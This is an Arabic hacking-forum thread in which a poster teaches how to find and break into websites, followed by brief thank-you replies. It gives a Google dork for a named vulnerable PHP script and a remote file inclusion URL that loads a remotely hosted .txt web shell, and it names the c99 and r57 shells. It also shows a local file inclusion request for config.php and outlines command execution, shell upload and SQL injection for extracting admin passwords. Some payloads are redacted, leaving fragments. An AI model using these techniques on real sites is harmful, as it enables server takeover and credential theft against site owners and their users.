حوار حول استغلال ثغرات المنتديات واستغلالها

[DR.X]

كيف الاحوال جميعا

درس اليوم شرح بيه بعض الثغرات

اللي تفيدنا لما نجي نستهدف موقع
ونلقي بيه الثغرة نعرف شنو هي وشنو استثمارها


اولا نجي للثغرة المألوفه

remote file include

remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ

ادراج ملف للتحكم

طيب للتحكم في ايه

اقولك في الموقع اللي عايزين نخترقوا

طيب ايه نوع الملف
بيكون شيل ------ هذ الشيل مرفوع علي استضافه بصيغة txt يتم ربطه بالموقع عن طريق الثغرة
للتحكم في الموقع والسيرفر كامل
---------------------
اوكـ نجيب ثغرة نطبق عليها

Dork:


كود:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
..................................

طيب dork للي ما يعرفها يعني كود البحث عن الثغرة في مواقع البحث
واللي تحتها هذا هو الكود اللي بنبحث عنوا في غوغل مثلا حتي نري المواقع المصابه به

نجي للاستثمار او الاستغلال
بعض الكلمات اللي لما تراها تعرف انها استغلال
Example:
Expl:
Exploit:
Exploits:
Expl


كود:
[] txt?
نشرح المثال اللي فوق

[] عنوان الموقع
ممكن يكون مكتوب في الثغر
kmitam الاسكريبت المصاب

= لادراج الشيل

[]




شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها

طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ

كود:
[]]/kmitam/htmlcode.php?file=http://[shll]/ txt?
ثغرة الفايل انكلود بتسمح لنا بأدراج شيل علي الموقع المصاب بها

يعني لو انا عندي موقع اسموا []
مركب به اسكريبت اسموا phpp هذا السكريبت به ثغرة من نوع ريموت فايل انكلود
استغلالها = ?index.php?gap=shll
طيب عشان اطبقها علي موقعي


كود:
[]
t?
وهذا شيل روسي رافعوا علي استضافه مجانيه بصيغة txt
'طيب فيه عندنا شيل روسي c99
وشيل r57
وشل sniper-sa وشيلات كتيرة
-Local File Include
او ...Remote File Disclosure
اختصارها lfi
طبعا هي شبيهه بالفايل انكلود
لكنها تسمح بادراج وقراءة الملفات علي السيرفر المصاب بالثغرة

بتكون زي كدا
[]
يعني رابط الموقع + السكريبت المصاب + الملف المصاب + تطيبق الاوامر
مثلا احنا عندنا ع الموقع داله اسمها get وعايزين نقرا الكونفيق تبعها
بيكون استغلالها زي كذا
http://localhost/mkportal/index.php?get=config.php
بمعني ان احنا امرنا السيرفر يقري لنا الكونفيق الموجود بملف get الموجود بالاسكريبت mkportal

النوع الثالث

remote command execution

عملها تطبيق الاوامر علي السيرفر مباشرة
طبعا راح نخصص دروس لاوامر اللينكس

مثال عليها

كود:
[]
نشرح المثال
هذا الموقع مصاب بثغرة الكوماند
استغلالها بيكون عرض اوامر اللينكس مباشرة علي الموقع المصاب
وهنا امرنا السيرفر بأحضار الملفات والمجلدات للموقع بالامر dir
بأمكاننا أمرة باي اوامر

النوع الرابع
Upload Shell


وهي ثغرة مراكز التحميل
ان وجدت بأمكاننا رفع ملفات خبيثه بصيغة php يعني نرفع الشيل ونضحك علي الموقع
ثغرة سهلها ولا تحتاج شرح

لكن بشرحها بالتفصيل فيما بعد

النوع الخامس

Remote SQL Injection

ثغرات خطيرة وانتشرت بكثرة هذة الايام
لان اغلب مبرمجين php يكتبون الان دوالهم بالسكيول والاتصال مع قواعد البيانات

ومهمتها سحب اليوزرات وقراءة الملفات
يعني حسب الثغرة المكتشفه بيكون النتيجه ممكن تجيب لنا باسورد المدير

مثال لها

[]

وهذا دورك البحث

d0rk :: "use your mind"
وهذا الاستغلال


كود:
[]
او


كود:
[]
طبعا بتضع الموقع المصاب
واضغط اوكـ

وهو بيطلع لك اليوزر نيمـ والباسورد اذا كان الموقع مصاب


تحياتي

[dabelzero]

**** بارك الله فيك

[WOLF_DZ]

مشكور اخي بارك الله فيك

[MdMn HaCk3r]

******* اخي العزيز
جزاك الله خيراً
تحيتي لك